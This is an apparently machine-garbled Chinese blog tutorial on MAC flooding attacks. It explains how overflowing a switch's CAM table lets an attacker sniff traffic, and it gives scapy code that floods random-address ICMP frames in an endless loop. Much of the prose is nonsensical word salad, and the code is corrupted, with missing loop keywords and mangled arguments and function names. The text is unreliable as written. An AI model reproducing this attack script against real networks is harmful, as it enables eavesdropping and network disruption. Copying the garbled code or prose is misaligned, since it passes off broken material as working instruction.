Menu
0 Comments

Python黑帽编程 3.3 MAC洪水攻击 – 玄魂工作室

全体与会者配电盘(我只量度我趋势运用的相互的机具)。,鉴于理性只同样表述)在录音转发换异中依赖对CAM表的查询来决定正式的的转发交谈,有重大意义的的MAC的对应入口处不克不及在曲中找到。,左右录音帧将被处置为播送帧。。凸轮台的满意的是有穷的的。,唯一的小半入口处可以仓库,当CAM表记载的MAC地址遂愿上限时,新的入口处不熟练的添加到CAM表中。

本超过准则,朕会碰见本人去风趣的气象。。PC陆续发送录音帧到未知目的。,每个录音包的源MAC地址区分,当这些子群以十足快的击毁发送时,在翻新的时间内急速的地衬料转变的凸轮表。。这些伪造的MAC地址占有率了CAM表。,真马 C地址入口处无法进入CAM表。。经过配电盘的无论什么不变的单播录音帧都是PROC。。在这种情况下,配电盘被降职为集中器。。

当配电盘被降职为集中器后,,朕可以监控连接到配电盘男教师的持有录音。。

自然,详细相互的稳固对ARP洪水的反应是差的,现场量度是责任的。。如今让朕进入设计关系。。

编码技击术

有大量的方式来构造的随机MAC和IP地址。,因地址的规范体式是在的。,包装材料起来舒适的。。嗨要给全部引见的是scapy模块做成某事RandMAC和RandIP方式。这两种方式用于随机建造MAC地址和IP地址。,收执模板参量的方式,建造倘若段的地址。。

像,上面的编码:

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandMAC()

    print RandIP()

    i=i-1

成功引起的事如次。图:

图2

条件必要IP来建造钉牢的使联播段,您可以输出指派的模板。。

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandIP(“.*”)

    i=i-1

成功引起的事如次。:

图3

在求解随机成绩以后的,如今让朕思索哪样的录音包可以遂愿左右目的?回头一看,既然朕在包中有指派的源IP和MAC,继转变将被记载决定并宣布。。

像,ARP包裹。:

Ether(SRC)RandMAC(),dst=FF:FF:FF:FF:FF:FFARP(OP)2,
psrc=
“”, hwdst=FF:FF:FF:FF:FF:FF)/Padding(装货)“X”*18))

像,ICMP包裹。:

Ether(SRC)RandMAC(“*:*:*:*:*:*”),

dst=RandMAC(“*:*:*:*:*:*”)) / \

IP(SRC)RandIP(“*.*.*.*”),

dst=RandIP(“*.*.*.*”)) / \

ICMP()

处理了这两个中心成绩。,你可以写出未经触动的的编码。:

图4

#!/usr/bin/python

import sys

from scapy.all import *

import time

iface=”eth0″

if Le())> 2

    iface=[1]

(1)

    packet= Ether(SRC)RandMAC(“*:*:*:*:*:*”),

                  dst=RandMAC(“*:*:*:*:*:*”)) / \

    IP(SRC)RandIP(“*.*.*.*”),

    dst=RandIP(“*.*.*.*”)) / \

    ICMP()

    ()

    sendp(packet,iface=iface,loop=0)

是你这么说的嘛!编码陆续发送ICMP录音包。,来引起MAC洪水攻击。成功引起的事如次。:

图5

2总结

本条文缺乏在流行中的设计的新知识。,贫穷对使更叠发生使联播和以太网有必然的认识。。

下一节,让朕探究对VLAN的攻击。。

VLAN攻击比率已在WeChat订阅号中声称。,激情先生输出订阅号码(在昏迷中二维码),从菜单栏> Python黑帽设计,您可以进入。。

检查未经触动的的导师的接连,请在意我的微信订阅号(宣匈521),低维二维码,恢复大蟒蛇。成绩议论请加QQ群。:Hacking (1群):303242737   Hacking (2群):147098303。

 

玄魂工作间-精彩而陆续

发表评论

电子邮件地址不会被公开。 必填项已用*标注